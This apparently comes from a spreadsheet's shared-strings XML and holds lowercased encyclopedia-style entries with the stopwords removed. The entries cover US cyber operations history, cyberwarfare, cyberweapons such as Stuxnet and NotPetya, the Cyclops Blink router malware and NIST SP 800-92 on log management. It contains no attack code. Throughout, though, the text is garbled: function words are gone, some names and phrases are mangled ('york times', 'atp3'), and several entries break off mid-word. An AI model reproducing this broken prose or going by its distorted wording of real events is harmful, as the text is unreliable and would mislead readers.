2014, white house presidential policy directive (ppd-28) "signals intelligence activities" published. this presidential policy directive highlighted principles, limitations use, process collection, safeguarding personal information, transparency related collection review cyber intelligence signal activities. august 2014, "gigabytes" sensitive data reported stolen jpmorgan chase (see 2014 jpmorgan chase data breach), company's internal investigation reported found data sent "major russian city." said investigating whether breach retaliation sanctions united states imposed russia relation 2014 russian military intervention ukraine. 2014, isight partners, global provider cyber threat intelligence, uncovered "long-term" "unprecedented" cyber espionage "the elaborate cyber espionage campaign using social engineering uncovered date nation". labelled "operation newscaster", targeted senior u.s. military diplomatic personnel, congresspeople, journalists, lobbyists, think tankers defense contractors, including four-star admiral. december 2014, cylance inc. published investigation so-called "operation cleaver" targeted world's unnamed leading enterprises, including united states. federal bureau investigation tacitly acknowledged operation "warned businesses stay vigilant report suspicious activity spotted companies' computer systems". december 2014, response hack based company sony (see sony pictures hack) believed perpetrated north korea, government created economic sanctions north korea listed country state sponsor terrorism. after hack, internet blackout north korea allegedly caused definitive evidence support claim. january 2015, terrorist group isis hacked united states central command took twitter youtube accounts. they distributed sensitive information obtained attack various social media platforms. april 2015, department defense cyber strategy updated published. original strategy operating cyberspace published july 2011. 2015 united states office personnel management (opm) victim described federal officials among largest breaches government data history united states, estimated 21.5 million records stolen. information targeted breach included personally identifiable information social security numbers, well names, dates places birth, addresses, likely involved theft detailed background security-clearance-related background information. june 2015, department defense (dod) included chapter dedicated cyber warfare manual. cyber warfare section 994. 2016 cyber command mounted computer-network attacks isis operation glowing symphony intent disrupt internal communication, manipulate data, undermine confidence group's security. particular emphasis placed locking figures accounts, deleting files propaganda, making look like general trouble instead intentional attack. this operation prompted internal debate american government whether alert allies would attacking servers located within countries. march 2018, office foreign assets control sanctioned russian intelligence agencies, federal security service (fsb) main intelligence directorate (gru) committing "destructive cyber-attacks." attacks include notpetya attack, assault allegedly conducted russian military february according statements white house british government, united states treasury described "the destructive costly cyber-attack history." march 2018, united states justice department charged nine iranians stealing scientific secrets behalf iran's revolutionary guard corps. defendants "stole terabytes academic data intellectual property universities, email accounts employees private sector companies, government agencies, non-governmental organizations." september 2018, united states justice department published criminal complaint park hyok, professional hacker alleged working north korea's military intelligence bureau, commitment three cyber-attacks: attack sony pictures 2014, theft $81m central bank bangladesh 2016, wannacry ransomware attack hundreds thousands computers. september 2018, white house "authorized offensive cyber operations" foreign threats result loosened restrictions digital weapons line president's directive; national security presidential memorandum (nspm 13). this allows military carry attacks shortened approval process. october 2018, united states cyber command launched still-classified operation synthetic theology. team experts deployed macedonia, ukraine, montenegro identify russian agents interfering election. team also gathering intelligence russia's cyber capabilities attacking internet research agency, "kremin-backed troll farm petersburg". beginning least march 2019, persistent cyber operations applied united states russia's power grid, seemingly national security presidential memorandum (september 2018).: pages june 2019, white house national security adviser john bolton announced u.s. offensive cyber operations would expanded include "economic cyber intrusions". these comments appear reference china's alleged theft information data u.s. corporations. june 2019, president trump ordered cyber attack iranian weapons systems retaliation shooting drone strait hormuz mine attacks tankers. attacks disabled iranian computer systems controlling rocket missile launchers. iran's islamic revolutionary guard corps (irgc) specifically targeted. also references further reading hunt, edward (2012). government computer penetration programs implications cyberwar". ieee annals history computing. (3): doi:10.1109/mahc.2011.82. s2cid 16367311. smeets, july 2022). history conducting cyber attacks". bulletin atomic scientists. (4): 208–213. obama order sped wave cyberattacks against iran diagram, june 2012</t>
  </si>
  <si>
    <t>Cyberwarfare</t>
  </si>
  <si>
    <t>cyberwarfare cyber attacks enemy state, causing comparable harm actual warfare and/or disrupting vital computer systems. some intended outcomes could espionage, sabotage, propaganda, manipulation economic warfare. there significant debate among experts regarding definition cyberwarfare, even thing exists. view term misnomer, since cyber attacks date could described war. alternative view suitable label cyber attacks cause physical damage people objects real world.many countries including united states, united kingdom, russia, china, israel, iran, north korea active cyber capabilities offensive defensive operations. states explore cyber operations combine capabilities likelihood physical confrontation violence playing result part cyber operation increased. however, meeting scale protracted nature unlikely, thus ambiguity remains.the first instance kinetic military action used response cyber-attack resulting loss human life observed 2019, israel defense forces targeted destroyed building associated ongoing cyber-attack. definition there ongoing debate cyberwarfare defined absolute definition widely agreed upon. while majority scholars, militaries governments definitions refer state state-sponsored actors, definitions include non-state actors, terrorist groups, companies, political ideological extremist groups, hacktivists, transnational criminal organizations depending context work.examples definitions proposed experts field follows. 'cyberwarfare' used broad context denote interstate technological force within computer networks information stored, shared communicated online.parks duggan focused analyzing cyberwarfare terms computer networks pointed "cyberwarfare combination computer network attack defense special technical operations." according perspective, notion cyberwarfare brings paradigm military doctrine. paulo shakarian colleagues, forward following definition 2013 drawing various works including clausewitz's definition war: "war continuation politics means":"cyberwarfare extension policy actions taken cyberspace state actors non-state actors significant state direction support) constitute serious threat another state's security, action nature taken response serious threat state's security (actual perceived)." taddeo offered following definition 2012: "the warfare grounded certain uses icts within offensive defensive military strategy endorsed state aiming immediate disruption control enemys resources, waged within informational environment, agents targets ranging physical non-physical domains whose level violence vary upon circumstances". robinson proposed 2015, intent attacker dictates whether attack warfare not, defining cyber warfare "the cyber attacks warfare-like intent."in 2010, former national coordinator security, infrastructure protection counter-terrorism, richard clarke, defined cyberwarfare "actions nation-state penetrate another nation's computers networks purposes causing damage disruption." cyber-physical infrastructure weaponized used adversary case cyber conflict, thus turning infrastructure tactical weapons. controversy term there debate whether term "cyberwarfare" accurate. 2012, eugene kaspersky, founder kaspersky lab, concludes "cyberterrorism" accurate term "cyberwar". states "with today's attacks, clueless strike again. it's cyber-war, cyberterrorism." howard schmidt, former cyber security coordinator obama administration, said "there cyberwar... think terrible metaphor think terrible concept. there winners environment."some experts take issue possible consequences linked warfare analogy. 2011, deibert, canada's citizen lab, warned "militarization cyberspace", militaristic responses appropriate. although, date, even serious cyber attacks disrupted large parts nations electrical grids (230,000 customers, ukraine, 2015) affected access medical care, thus endangering life (nhs, wannacry, 2017) military action.in 2017, oxford academic lucas kello proposed term "unpeace" denote highly damaging cyber actions whose non-violent effects rise level traditional war. such actions neither warlike peace like. although non-violent, thus acts war, damaging effects economy society greater even armed attacks. this term closely related concept "grey zone" come prominence 2017, describing actions fall traditional threshold war. cyberwarfare cyber term "cyberwarfare" distinct term "cyber war". "cyberwarfare" imply scale, protraction violence typically associated term "war". cyber warfare includes techniques, tactics procedures involved cyber war. term inherently refers large scale action, typically protracted period time include objectives seeking utilize violence kill. cyber could accurately describe protracted period back-and-forth cyber attacks (including combination traditional military action) warring states. date, action known occurred. instead, tit-for-tat military-cyber actions commonplace. example, june 2019, united states launched cyber attack iranian weapons systems retaliation shooting drone strait hormuz. cyberwarfare cyber sanctions digital attacks, described concept cyberwarfare, page retaliatory response cyber attacks. addition, countries cyber sanctions reaction targets cyber attacks. sometimes, easy detect attacker; however, might case suspicions focus certain country group countries. cases, unilateral multilateral economic sanctions used instead cyberwarfare. example, economic sanctions related cyber attacks frequently used united states government. there executive orders, 13694 2015 13757 2016, issued obama administration specifically focused implementation cyber sanctions. later executive orders frequently used following presidents. furthermore, congress important actor comes cyber sanctions. example, iran cyber sanctions 2016 bill imposes sanctions specific individuals responsible cyber attacks. types threat types warfare cyber warfare present multitude threats towards nation. basic level, cyber attacks used support traditional warfare. example, tampering operation defenses cyber means order facilitate attack. aside "hard" threats, cyber warfare also contribute towards "soft" threats espionage propaganda. eugene kaspersky, founder kaspersky lab, equates large-scale cyber weapons, flame nettraveler company discovered, biological weapons, claiming interconnected world, potential equally destructive. espionage traditional espionage war, cyber-espionage, generally assumed ongoing major powers. despite assumption, incidents cause serious tensions nations, often described "attacks". example: massive spying many countries, revealed edward snowden. after nsa's spying germany's chancellor angela merkel revealed, chancellor compared stasi. recording nearly every cell phone conversation bahamas, without bahamian government's permission, similar programs kenya, philippines, mexico afghanistan. "titan rain" probes american defense contractors computer systems since 2003. office personnel management data breach, widely attributed china. security firm area published details breach compromised european union's diplomatic communication channels three years.out cyber attacks, espionage based. sabotage computers satellites coordinate activities vulnerable components system could lead disruption equipment. compromise military systems, c4istar components responsible orders communications could lead interception malicious replacement. power, water, fuel, communications, transportation infrastructure vulnerable disruption. according clarke, civilian realm also risk, noting security breaches already gone beyond stolen credit card numbers, potential targets also include electric power grid, trains, stock market.in mid-july 2010, security experts discovered malicious software program called stuxnet infiltrated factory computers spread plants around world. considered "the first attack critical industrial infrastructure sits foundation modern economies," notes york times.stuxnet, extremely effective delaying iran's nuclear program development nuclear weaponry, came high cost. first time, became clear could cyber weapons defensive could offensive. large decentralization scale cyberspace makes extremely difficult direct policy perspective. non-state actors play large part cyberwar space state actors, leads dangerous, sometimes disastrous, consequences. small groups highly skilled malware developers able effectively impact global politics cyber warfare large governmental agencies. major aspect ability lies willingness groups share exploits developments form arms proliferation. this allows lesser hackers become proficient creating large scale attacks small handful skillful enough manage. addition, thriving black markets kinds cyber weapons buying selling cyber capabilities highest bidder without regard consequences. denial-of-service attack computing, denial-of-service attack (dos attack) distributed denial-of-service attack (ddos attack) attempt make machine network resource unavailable intended users. perpetrators attacks typically target sites services hosted high-profile servers banks, credit card payment gateways, even root nameservers. attacks often leverage internet-connected devices vulnerable security measures carry large-scale attacks. attacks limited computer-based methods, strategic physical attacks infrastructure devastating. example, cutting undersea communication cables severely cripple regions countries regards information warfare ability. electrical power grid federal government united states admits electric power grid susceptible cyberwarfare. united states department homeland security works industries identify vulnerabilities help industries enhance security control system networks. federal government also working ensure security built next generation "smart grid" networks developed. april 2009, reports surfaced china russia infiltrated u.s. electrical grid left behind software programs could used disrupt system, according current former national security officials. north american electric reliability corporation (nerc) issued public notice warns electrical grid adequately protected cyber attack. china denies intruding u.s. electrical grid. countermeasure would disconnect power grid internet droop speed control only. massive power outages caused cyber attack could disrupt economy, distract simultaneous military attack, create national trauma.iranian hackers, possibly iranian cyber army pushed massive power outage hours provinces turkey, impacting million people. istanbul ankara among places suffering blackout.howard schmidt, former cyber-security coordinator commented possibilities: it's possible hackers gotten administrative computer systems utility companies, says linked equipment controlling grid, least developed countries. [schmidt] never heard grid hacked. june 2019, russia said electrical grid cyber-attack united states. york times reported american hackers united states cyber command planted malware potentially capable disrupting russian electrical grid. propaganda cyber propaganda effort control information whatever form takes, influence public opinion. form psychological warfare, except uses social media, fake news websites digital means. 2018, nicholas carter, chief general staff british army stated kind attack actors russia form system warfare seeks de-legitimize political social system military strength based".jowell o'donnell (2006) state "propaganda deliberate, systematic attempt shape perceptions, manipulate cognitions, direct behavior achieve response furthers desired intent propagandist" internet important means communication today. people convey messages quickly across huge audience, open window evil. terrorist organizations exploit medium brainwash people. suggested restricted media coverage terrorist attacks would turn decrease number terrorist attacks occur afterwards. economic disruption 2017, wannacry petya (notpetya) cyber attacks, masquerading ransomware, caused large-scale disruptions ukraine well u.k.'s national health service, pharmaceutical giant merck, maersk shipping company organizations around world. these attacks also categorized cybercrimes, specifically financial crime negatively affect company group. surprise cyber attack idea "cyber pearl harbor" debated scholars, drawing analogy historical war. others used "cyber 9/11" draw attention nontraditional, asymmetric, irregular aspect cyber action state. motivations there number reasons nations undertake offensive cyber operations. sandro gaycken, cyber security expert adviser nato, advocates states take cyber warfare seriously viewed attractive activity many nations, times peace. offensive cyber operations offer large variety cheap risk-free options weaken countries strengthen positions. considered long-term, geostrategic perspective, cyber offensive operations cripple whole economies, change political views, agitate conflicts within among states, reduce military efficiency equalize capacities high-tech nations low-tech nations, access critical infrastructures blackmail them. military with emergence cyber substantial threat national global security, cyber war, warfare and/or attacks also became domain interest purpose military.in u.s., general keith alexander, first head uscybercom, told senate armed services committee computer network warfare evolving rapidly "mismatch technical capabilities conduct operations governing laws policies. cyber command newest global combatant sole mission cyberspace, outside traditional battlefields land, sea, space." attempt find and, necessary, neutralize cyberattacks defend military computer networks.alexander sketched broad battlefield envisioned computer warfare command, listing kind targets headquarters could ordered attack, including "traditional battlefield prizes command-and-control systems military headquarters, defense networks weapons systems require computers operate."one cyber warfare scenario, cyber-shockwave, wargamed cabinet level former administration officials, raised issues ranging national guard power grid limits statutory authority.the distributed nature internet based attacks means difficult determine motivation attacking party, meaning unclear specific considered war.examples cyberwarfare driven political motivations found worldwide. 2008, russia began cyber attack georgian government website, carried along georgian military operations south ossetia. 2008, chinese "nationalist hackers" attacked reported chinese repression tibet. hackers armenia azerbaijan actively participated cyberwarfare part nagorno-karabakh conflict, azerbaijani hackers targeting armenian websites posting ilham aliyev's statements.jobs cyberwarfare become increasingly popular military. four branches united states military actively recruit cyber warfare positions.as military become entangled national global threat proposed utilization cyber domain, research field within military science field slowly emerged. essence, focus centered towards describing, understanding explaining military cyber operations tackled. handbook military sciences aaron brantly smeets define military cyber operations "those cyber operations military entity nation-state plans conducts achieve strategic, operational, tactical gain." more argue types military operations commonly divided three types operations. defensive cyber operations: encompassing "those actions taken computer networks protect, monitor, analyze, detect, respond unauthorized activity within governments information systems computer networks"." cyber espionage operations: encompassing "those actions taken computer networks gather data target adversary information systems network"." offensive cyber operations: encompassing "those actions taken computer networks disrupt, deny, degrade, destroy information resident computers computer networks, computers networks themselves, basic, operations designed achieve tangible effects"." civil potential targets internet sabotage include aspects internet backbones web, internet service providers, varying types data communication mediums network equipment. this would include: servers, enterprise information systems, client server systems, communication links, network equipment, desktops laptops businesses homes. electrical grids, financial networks, telecommunication systems also deemed vulnerable, especially current trends computerization automation. hacktivism politically motivated hacktivism involves subversive computers computer networks promote agenda, potentially extend attacks, theft virtual sabotage could seen cyberwarfare mistaken hacktivists knowledge software tools gain unauthorized access computer systems seek manipulate damage material gain cause widespread destruction, draw attention cause well-publicized disruptions select targets. anonymous hacktivist groups often portrayed media cyber-terrorists, wreaking havoc hacking websites, posting sensitive information victims, threatening attacks demands met. however, hacktivism that. actors politically motivated change world, fundamentalism. groups like anonymous, however, divided opinion methods. income generation cyber attacks, including ransomware, used generate income. states techniques generate significant sources income, evade sanctions perhaps simultaneously harming adversaries (depending targets). this tactic observed august 2019 revealed north korea generated billion fund weapons program, avoiding blanket sanctions levied united states, united nations european union. private sector computer hacking represents modern threat ongoing global conflicts industrial espionage presumed widely occur. typical type crime underreported extent known. according mcafee's george kurtz, corporations around world face millions cyberattacks day. "most attacks gain media attention lead strong political statements victims." this type crime usually financially motivated. non-profit research engage cyberwarfare financial ideological reasons. there institutes companies like university cincinnati kaspersky security engage cyberwarfare better understand field actions like researching publishing security threats. preparedness number countries conduct exercise increase preparedness explore strategy, tactics operations involved conducting defending cyber attacks hostile states, typically done form games.the cooperative cyber defence centre excellence (ccdce), part north atlantic treaty organization (nato), conducted yearly game called locked shields since 2010 designed test readiness improve skills, strategy tactics operational decision making participating national organizations. locked shields 2019 1200 participants countries compete team blue team exercise. game involved fictional country, berylia, "experiencing deteriorating security situation, number hostile events coincide coordinated cyber attacks major civilian internet service provider maritime surveillance system. attacks caused severe disruptions power generation distribution, communication systems, maritime surveillance, water purification plant critical infrastructure components". ccdce describe exercise "maintain operation various systems intense pressure, strategic part addresses capability understand impact decisions made strategic policy level." ultimately, france winner locked shields 2019.the european union conducts cyber game scenarios member states foreign partner states improve readiness, skills observe strategic tactical decisions affect scenario.as well games serve broader purpose explore options improve skills, cyber games targeted preparing specific threats. 2018 sunday times reported government conducting cyber games could "blackout moscow". these types games move beyond defensive preparedness, previously described onto preparing offensive capabilities used deterrence, "war". cyber activities nation approximately countries developing ways internet weapon target financial markets, government computer systems utilities. asia china foreign policy magazine puts size china's "hacker army" anywhere 50,000 100,000 individuals.diplomatic cables highlight concerns china using access microsoft source code 'harvesting talents private sector' boost offensive defensive capabilities.the 2018 cyberattack marriott hotel chain collected personal details roughly million guests known part chinese intelligence-gathering effort also hacked health insurers security clearance files millions americans, hackers, suspected working behalf ministry state security, country's communist-controlled civilian agency. "the information exactly chinese root spies, recruit intelligence agents build rich repository americans' personal data future targeting." 2008 article culture mandala: bulletin centre east-west cultural economic studies jason fritz alleges chinese government 1995 2008 involved number high-profile cases espionage, primarily "decentralized network students, business people, scientists, diplomats, engineers within chinese diaspora". defector belgium, purportedly agent, claimed hundreds spies industries throughout europe, defection australia chinese diplomat chen yonglin said 1,000 country. 2007, russian executive sentenced years passing information rocket space technology organization china. targets united states included "aerospace engineering programs, space shuttle design, c4isr data, high-performance computers, nuclear weapon design, cruise missile data, semiconductors, integrated circuit design, details arms sales taiwan".while china continues held responsible string cyber-attacks number public private institutions united states, india, russia, canada, france, chinese government denies involvement cyber-spying campaigns. administration maintains position china threat rather victim increasing number cyber-attacks. most reports china's cyber warfare capabilities confirmed chinese government.according fritz, china expanded cyber capabilities military technology acquiring foreign military technology. fritz states chinese government uses "new space-based surveillance intelligence gathering systems, anti-satellite weapon, anti-radar, infrared decoys, false target generators" assist quest, support "informatisation" military "increased education soldiers cyber warfare; improving information network military training, built virtual laboratories, digital libraries digital campuses." through informatisation, hope prepare forces engage different kind warfare, technically capable adversaries. many recent news reports link china's technological capabilities beginning "cyber cold war."operation shady ongoing series cyber attacks starting mid-2006, reported internet security company mcafee august 2011. china widely believed state actor behind attacks least organizations including governments defense contractors.on september 2020, database showing personal details million people around world leaked published. chinese company, zhenhua data information technology co., ltd. compiled database. according information "national enterprise credit information publicity system", state administration market regulation china, shareholders zhenhua data information technology co., ltd. natural persons general partnership enterprise whose partners natural persons. wang xuefeng, chief executive shareholder zhenhua data, publicly boasted supports "hybrid warfare" manipulation public opinion "psychological warfare". india department information technology created indian computer emergency response team (cert-in) 2004 thwart cyber attacks india. that year, reported cyber security breaches. 2011, 13,301. that year, government created subdivision, national critical information infrastructure protection centre (nciipc) thwart attacks energy, transport, banking, telecom, defense, space sensitive areas.the executive director nuclear power corporation india (npcil) stated february 2013 company alone forced block targeted attacks day. cert-in left protect less critical sectors.a high-profile cyber attack july 2012 breached email accounts 12,000 people, including officials ministry external affairs, ministry home affairs, defense research development organizations (drdo), indo-tibetan border police (itbp). government-private sector plan overseen national security advisor (nsa) shivshankar menon began october 2012, intends boost india's cyber security capabilities light group experts findings india faces 470,000 shortfall experts despite country's reputation software powerhouse.in february 2013, information technology secretary satyanarayana stated nciipc finalizing policies related national cyber security would focus domestic security solutions, reducing exposure foreign technology. other steps include isolation various security agencies ensure synchronised attack could succeed fronts planned appointment national cyber security coordinator. month, significant economic physical damage india related cyber attacks. november 2010, group calling indian cyber army hacked websites belonging pakistan army others belong different ministries, including ministry foreign affairs, ministry education, ministry finance, pakistan computer bureau, council islamic ideology, etc. attack done revenge mumbai terrorist attacks.on december 2010, group calling pakistan cyber army hacked website india's investigating agency, central bureau investigation (cbi). national informatics center (nic) begun inquiry.in july 2016, cymmetria researchers discovered revealed cyber attack dubbed 'patchwork', compromised estimated 2500 corporate government agencies using code stolen github dark web. examples weapons used exploit sandworm vulnerability (cve-2014-4114), compiled autoit script, bypass code dubbed uacme. targets believed mainly military political assignments around southeast asia south china attackers believed indian origin gathering intelligence influential parties.the defence cyber agency, indian military agency responsible cyberwarfare, expected become operational november 2019. philippines chinese blamed cybersecurity company, f-secure labs, found malware, nanhaishu, targeted philippines department justice. sent information infected machine server chinese address. malware considered particularly sophisticated nature introduced phishing emails designed look like coming authentic sources. information sent believed relating south china legal case. south korea july 2009, series coordinated denial service attacks major government, news media, financial websites south korea united states. while many thought attack directed north korea, researcher traced attacks united kingdom. security researcher chris kubecka presented evidence multiple european union united kingdom companies unwittingly helped attack south korea w32.dozer infections, malware used part attack. some companies used attack partially owned several governments, complicating attribution. july 2011, south korean company communications hacked, resulting theft personal details (including names, phone numbers, home email addresses resident registration numbers) million people. trojaned software update used gain access communications network. links exist hack malicious activity believed part broader, concerted hacking effort.with ongoing tensions korean peninsula, south korea's defense ministry stated south korea going improve cyber-defense strategies hopes preparing possible cyber attacks. march 2013, south korea's major banks shinhan bank, woori bank nonghyup bank well many broadcasting stations kbs, hacked 30,000 computers affected; biggest attacks south korea faced years. although remains uncertain involved incident, immediate assertions north korea connected, threatened attack south korea's government institutions, major national banks traditional newspapers numerous times reaction sanctions received nuclear testing continuation foal eagle, south korea's annual joint military exercise united states. north korea's cyber warfare capabilities raise alarm south korea, north korea increasing manpower military academies specializing hacking. current figures state south korea units specialized personnel, north korea 3,000 highly trained hackers; portrays huge cyber warfare capabilities sends message south korea step strengthen cyber warfare command forces. therefore, order prepared future attacks, south korea united states discuss deterrence plans security consultative meeting (scm). scm, plan developing strategies focuses accelerating deployment ballistic missiles well fostering defense shield program, known korean missile defense. lanka north korea africa egypt extension bilateral dispute ethiopia egypt grand ethiopian renaissance dam, ethiopian government websites hacked egypt-based hackers june 2020. europe cyprus york times published exposé revealing extensive three-year phishing campaign aimed diplomats based cyprus. after accessing state system hackers access european union's entire exchange database. login coreu, hackers accessed communications linking states, sensitive sensitive matters. event exposed poor protection routine exchanges among european union officials coordinated effort foreign entity another country. "after decade experience countering chinese cyberoperations extensive technical analysis, doubt campaign connected chinese government", said blake darche, area security experts company revealing stolen documents. chinese embassy return calls comment. 2019, another coordinated effort took place allowed hackers gain access government (gov.cy) emails. cisco's talos security department revealed "sea turtle" hackers carried broad piracy campaign countries, hitting different organizations, including cyprus. estonia april 2007, estonia came cyber attack wake relocation bronze soldier tallinn. largest part attacks coming russia official servers authorities russia. attack, ministries, banks, media targeted. this attack estonia, seemingly small baltic state, effective estonian government services online. estonia implemented e-government, bank services, political elections taxes, pretty much anything modern society done online. france 2013, french minister defense, jean-yves drian, ordered creation cyber army, representing fourth national army corp (along ground, naval forces) french ministry defense, protect french european interests soil abroad. contract made french firm eads (airbus) identify secure main elements susceptible cyber threats. 2016 france planned 2600 "cyber-soldiers" million euros investment cybersecurity products army corp. additional 4400 reservists constitute heart army 2019. germany 2013, germany revealed existence 60-person computer network operation unit. german intelligence agency, bnd, announced seeking hire "hackers" "cyber defence station" unit. march 2013, president gerhard schindler announced agency observed five attacks government authorities, thought mainly originate china. confirmed attackers accessed data expressed concern stolen information could used basis future sabotage attacks arms manufacturers, telecommunications companies government military agencies. shortly edward snowden leaked details u.s. national security agency's cyber surveillance system, german interior minister hans-peter friedrich announced would given additional budget million euros increase cyber surveillance capability total internet traffic germany total traffic, maximum amount allowed german law. greece greek hackers anonymous greece targeted azerbaijani governmental websites 2020 nagorno-karabakh conflict armenia azerbaijan. netherlands netherlands, cyber defense nationally coordinated national cyber security centrum (ncsc). dutch ministry defense laid cyber strategy 2011. first focus improve cyber defense handled joint branch (jivc). improve intel operations, intel community netherlands (including military intel organization, mivd) joint sigint cyber unit (jscu). ministry defense oversees offensive cyber force, called defensive cyber command (dcc). norway russia russian, south ossetian, georgian azerbaijani sites attacked hackers 2008 south ossetia war.american-led cyberattacks soviet union russia when russia still part soviet union 1982, portion trans-siberia pipeline within territory exploded, allegedly trojan horse computer malware implanted pirated canadian software central intelligence agency. malware caused scada system running pipeline malfunction. "farewell dossier" provided information attack, wrote compromised computer chips would become part soviet military equipment, flawed turbines would placed pipeline, defective plans would disrupt output chemical plants tractor factory. this caused "most monumental nonnuclear explosion fire ever seen space." however, soviet union blame united states attack.in june 2019, york times reported american hackers united states cyber command planted malware potentially capable disrupting russian e</t>
  </si>
  <si>
    <t>Cyberweapon</t>
  </si>
  <si>
    <t>cyberweapon commonly defined malware agent employed military, paramilitary, intelligence objectives part cyberattack. this includes computer viruses, trojans, spyware, worms introduce corrupted code existing software, causing computer perform actions processes unintended operator. characteristics cyberweapon usually sponsored employed state non-state actor, meets objective would otherwise require espionage force, employed specific targets. cyberweapon performs action would normally require soldier spy, would considered either illegal performed directly human agent sponsor peacetime. legal issues include violating privacy target sovereignty host nation. example actions surveillance, data theft electronic physical destruction. while cyberweapon almost certainly results either direct indirect financial damages target group, direct financial gains sponsor primary objective class agent. often cyberweapons associated causing physical functional harm system attacks, despite software. however, consensus officially constitutes cyberweapon.unlike malware used script kiddies organize botnets, ownership, physical location, normal role machines attacked largely irrelevant, cyberweapons show high selectivity either employment operation. before attack, cyberweapons usually identify target using different methods. likewise, malware employed fraudsters theft personal financial information demonstrates lower selectivity wider distribution. cyberweapons dangerous multiple reasons. they typically difficult track defend lack physical components. their anonymity allows hide systems undetected attack unleashed. many attacks exploit "zero days" (vulnerabilities software companies zero days fix). they also significantly cheaper produce cyber defenses protect them. oftentimes, cyberweapons force obtained opposing force repurposed used original force, seen cyberweapons wannacry notpetya.while term cyber weapon frequently used press, articles avoid instead using terms "internet weapon", "hack", "virus". mainstream researchers debate requirements term still referring employment agent "weapon", software development community particular uses term rarely. examples following malware agents generally meet criteria above, formally referred manner industry security experts, described government military statements: duqu flame (malware) great cannon mirai (malware) stuxnet wiper (malware) pegasus (spyware) history stuxnet among first influential cyberweapons. 2010, launched united states israel attack iranian nuclear facilities. stuxnet considered first major cyberweapon. stuxnet also first time nation used cyberweapon attack another nation. following stuxnet attacks, iran used cyberweapons target american financial institutions, including york stock exchange.stuxnet subsequently followed duqu 2011 flame 2012. flame's complexity unmatched time. used vulnerabilities microsoft windows spread. specifically targeted iranian terminals.in 2017 data breaches showed supposedly secure hacking tools used government agencies obtained sometimes exposed third parties. furthermore, reported losing control tools government appears leave "exploits open re-used scammers, criminals, anyone else purpose". claudio guarnieri, technologist amnesty international states: "what learn disclosures leaks last months unknown vulnerabilities maintained secret even they've clearly lost, plain irresponsible unacceptable".also year wikileaks released vault documents series contain details exploits tools julian assange stating working "disarm" publication. disarmament cyber weapons come form contacting respective software vendors information vulnerabilities products well potential help autonomous development (for open source software) patches. exploitation hacking tools third parties particularly affected united states national security agency (nsa). 2016, information hacking tools captured chinese hacking group, atp3, allowed reverse engineer version tool. subsequently used european asian nations, though united states targeted. later year, anonymous group called "shadow brokers" leaked tools online. these groups known affiliated, atp3 access tools least year shadow brokers leak. leaked tools developed equation group, cyberwarfare group works nsa.among tools leaked shadow brokers eternalblue, used exploit bugs microsoft windows. this prompted microsoft issue updates guard tool. when shadow brokers publicly released eternalblue, quickly used north korean russian hackers, formed ransomware wannacry notpetya, respectively. notpetya, initially launched ukraine subsequently spread around world, encrypted hard drives forced users ransom data, despite never actually giving data back.in september 2018, united states department defense officially confirmed united states uses cyberweapons advance national interests.in 2022, york times discovered f.b.i secretly bought pegasus spyware software "domestic surveillance". bureau finally decided 2021 deploy tools. potential regulations while full regulation cyberweapons, possible systems regulation proposed. system would cyberweapons, used state, subject criminal country and, used state, subject international laws warfare. most proposed systems rely international enforcement stop inappropriate cyberweaponry. considering novelty weapons, also discussion previously existing laws, designed cyberweapons mind, apply them. also cyber-arms industry cyberattack cyberwarfare exploit (computer security) list cyber warfare forces proactive cyber defence zero-day (computing) references external links prashant mali, 2018 defining cyber weapon context technology stefano mele, 2013, cyber-weapons: legal strategic aspects (version 2.0) stefano mele, september 2010, cyberwarfare damaging effects citizens michael riley ashlee vance, july 2011, cyber weapons: arms race</t>
  </si>
  <si>
    <t>Cyclops Blink</t>
  </si>
  <si>
    <t>cyclops blink malware targeting network hardware goal adding targeted device botnet command control (c&amp;c). malware targets routers firewall devices sold companies watchguard asus. infection exploit code cve-2022-23176, allows privilege escalation obtain management ability device. after device infected, acts command control server, software design allows modules installed resilient firmware upgrades. cyclops blink first reported february 2022 security advisories published united kingdom's national cybersecurity centre (ncsc) united states' cybersecurity infrastructure security agency (cisa) detailed presence wild. according agencies, malware originates hacker group sandworm, team within gru, military intelligence unit russian federation. malware drawn comparison earlier vpnfilter based shared origin similar operation attacking network devices. according cyber security firm trend micro inc., malware around since least june 2019. thousands routers cleaned. although sandworm attacked ukrainian assets past, malware targeted ukrainian networking equipment thought unrelated russo-ukrainian war. references external links ncsc malware analysis report detection remediation actions watchguard</t>
  </si>
  <si>
    <t>NIST Special Publication 800-92</t>
  </si>
  <si>
    <t>nist special publication 800-92, "guide computer security management," establishes guidelines recommendations securing managing sensitive data. publication prepared karen kent murugiah souppaya national institute science technology published 800-series; repository best practices infosec community. management essential ensuring computer security records stored sufficient detail appropriate period time. background effective security event logging analysis critical component comprehensive security program within organization. used monitor system, network application activity. serves deterrent unauthorized activity, well provide means detect analyze attack order allow organization mitigate prevent similar attacks future. however, security professionals significant challenge determine events must logged, long retain logs, analyze enormous amount information generated. deficiency areas cause organization miss signs unauthorized activity, intrusion, loss data, creates additional risk. scope nist 800-92 provides high-level overview guidance planning, development implementation effective security management strategy. intended audience publication include general information security (infosec) community involved incident response, system/application/network administration managers.nist 800-92 defines management infrastructure major functions: general parsing, event filtering event aggregation; storage rotation, archival, compression, reduction, normalization, integrity checking; analysis event correlation, viewing reporting; disposal clearing;nist 800-92 address following security management challenges: volume exceeding rate analysis; ensuring immutability storage transmission; inconsistent vendor formats; importance consistent review schedule; retention issues involving purging, long term storage, cost;nist 800-92 makes following recommendations security management: establish policies procedures management; prioritize management appropriately throughout organization; create maintain management infrastructure; provide proper support staff management responsibilities; establish standard management operational processes; compliance following federal regulations require proper handling storage sensitive data: hipaa (health insurance portability accountability 1996). requires mandatory safeguard personal health information. (sarbanes-oxley 2002). requires mandatory record keeping financial related data. glba (gramm-leach-bliley act). requires mandatory (personal identifiable information) data protection. (payment card industry data security standard). requires mandatory protection consumer credit card information including storage transmission. fisma (federal information security management 2002). stipulates federal requirements managing government network systems data. management guidelines include generation, review, protection retention audit records, well actions taken audit failure. references external links nist special publication 800-92</t>
  </si>
  <si>
    <t>TorSearch</t>
  </si>
  <si>
